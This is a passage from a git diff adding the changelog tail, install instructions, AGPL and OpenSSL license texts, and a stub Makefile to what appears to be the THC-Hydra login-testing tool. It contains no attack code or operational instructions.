:-(, additionally the blocking/recv works better + now. (no, not better - perfect ;-) +* Fixed a bug in hydra-telnet.c: too many false alarms for success due some + mis-thinking on my side and I also implemented a more flexible checking +* Fixed hydra-ftp.c to allow more weird reactions +* Fixed all ;-) memory leaks + +v0.5 (December 2000) PUBLIC RELEASE +* NOTE WE HAVE GOT A NEW WWW ADDRESS -> www.thehackerschoice.com +* added telnet protocol +* exchanged snprintf with sprintf(%.250s) to let it compile on more platforms + but still have buffer overflow protection. +* fixed a bug in Makefile.in (introduced by Plasmo ,-) + +v0.4 (August 2000) PUBLIC RELEASE +* Plasmoid added a ./configure script. thanks! + +v0.3 (August 2000) +* first release diff --git a/INSTALL b/INSTALL new file mode 100755 index 0000000..8e33f87 --- /dev/null +++ b/INSTALL @@ -0,0 +1,11 @@ +type "./configure", then "make" and finally "sudo make install" + +For special modules you need to install software packages before +you run "./configure": + Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev + Redhat/Fedora: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel + OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel + +For the Oracle login module, install the basic and SDK packages: + http://www.oracle.com/technetwork/database/features/instant-client/index.html + diff --git a/LICENSE b/LICENSE new file mode 100755 index 0000000..052a76b --- /dev/null +++ b/LICENSE @@ -0,0 +1,683 @@ +[see the end of the file for the special exception for linking with OpenSSL + - debian people need this] + + + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. + + +Special Exception + + * In addition, as a special exception, the copyright holders give + * permission to link the code of portions of this program with the + * OpenSSL library under certain conditions as described in each + * individual source file, and distribute linked combinations + * including the two. + * You must obey the GNU Affero General Public License in all respects + * for all of the code used other than OpenSSL. If you modify + * file(s) with this exception, you may extend this exception to your + * version of the file(s), but you are not obligated to do so. If you + * do not wish to do so, delete this exception statement from your + * version. If you delete this exception statement from all source + * files in the program, then also delete it here. + diff --git a/LICENSE.OPENSSL b/LICENSE.OPENSSL new file mode 100755 index 0000000..d3a9e21 --- /dev/null +++ b/LICENSE.OPENSSL @@ -0,0 +1,170 @@ +/* + * (c) 2002, 2003, 2004 by Jason McLaughlin and Riadh Elloumi + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, but + * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied + * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and + * NON-INFRINGEMENT. See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, + * MA 02111-1307, USA. + * + * In addition, as a special exception, the copyright holders give + * permission to link the code of portions of this program with the + * OpenSSL library under certain conditions as described in each + * individual source file, and distribute linked combinations + * including the two. + * You must obey the GNU General Public License in all respects + * for all of the code used other than OpenSSL. If you modify + * file(s) with this exception, you may extend this exception to your + * version of the file(s), but you are not obligated to do so. If you + * do not wish to do so, delete this exception statement from your + * version. If you delete this exception statement from all source + * files in the program, then also delete it here. + */ + +Certain source files in this program permit linking with the OpenSSL +library (http://www.openssl.org), which otherwise wouldn't be allowed +under the GPL. For purposes of identifying OpenSSL, most source files +giving this permission limit it to versions of OpenSSL having a license +identical to that listed in this file (LICENSE.OpenSSL). It is not +necessary for the copyright years to match between this file and the +OpenSSL version in question. However, note that because this file is +an extension of the license statements of these source files, this file +may not be changed except with permission from all copyright holders +of source files in this program which reference this file. + + + LICENSE ISSUES + ============== + + The OpenSSL toolkit stays under a dual license, i.e. both the conditions of + the OpenSSL License and the original SSLeay license apply to the toolkit. + See below for the actual license texts. Actually both licenses are BSD-style + Open Source licenses. In case of any license issues related to OpenSSL + please contact openssl-core@openssl.org. + + OpenSSL License + --------------- + +/* ==================================================================== + * Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in + * the documentation and/or other materials provided with the + * distribution. + * + * 3. All advertising materials mentioning features or use of this + * software must display the following acknowledgment: + * "This product includes software developed by the OpenSSL Project + * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" + * + * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to + * endorse or promote products derived from this software without + * prior written permission. For written permission, please contact + * openssl-core@openssl.org. + * + * 5. Products derived from this software may not be called "OpenSSL" + * nor may "OpenSSL" appear in their names without prior written + * permission of the OpenSSL Project. + * + * 6. Redistributions of any form whatsoever must retain the following + * acknowledgment: + * "This product includes software developed by the OpenSSL Project + * for use in the OpenSSL Toolkit (http://www.openssl.org/)" + * + * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY + * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR + * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED + * OF THE POSSIBILITY OF SUCH DAMAGE. + * ==================================================================== + * + * This product includes cryptographic software written by Eric Young + * (eay@cryptsoft.com). This product includes software written by Tim + * Hudson (tjh@cryptsoft.com). + * + */ + + Original SSLeay License + ----------------------- + +/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) + * All rights reserved. + * + * This package is an SSL implementation written + * by Eric Young (eay@cryptsoft.com). + * The implementation was written so as to conform with Netscapes SSL. + * + * This library is free for commercial and non-commercial use as long as + * the following conditions are aheared to. The following conditions + * apply to all code found in this distribution, be it the RC4, RSA, + * lhash, DES, etc., code; not just the SSL code. The SSL documentation + * included with this distribution is covered by the same copyright terms + * except that the holder is Tim Hudson (tjh@cryptsoft.com). + * + * Copyright remains Eric Young's, and as such any Copyright notices in + * the code are not to be removed. + * If this package is used in a product, Eric Young should be given attribution + * as the author of the parts of the library used. + * This can be in the form of a textual message at program startup or + * in documentation (online or textual) provided with the package. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * 3. All advertising materials mentioning features or use of this software + * must display the following acknowledgement: + * "This product includes cryptographic software written by + * Eric Young (eay@cryptsoft.com)" + * The word 'cryptographic' can be left out if the rouines from the library + * being used are not cryptographic related :-). + * 4. If you include any Windows specific code (or a derivative thereof) from + * the apps directory (application code) you must include an acknowledgement: + * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" + * + * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + * + * The licence and distribution terms for any publically available version or + * derivative of this code cannot be changed. i.e. this code cannot simply be + * copied and put under another distribution licence + * [including the GNU Public Licence.] + */ + diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..372e67e --- /dev/null +++ b/Makefile @@ -0,0 +1,5 @@ +all: + @echo Error: you must run "./configure" first + +clean: + cp -f Makefile.orig Makefile diff --git 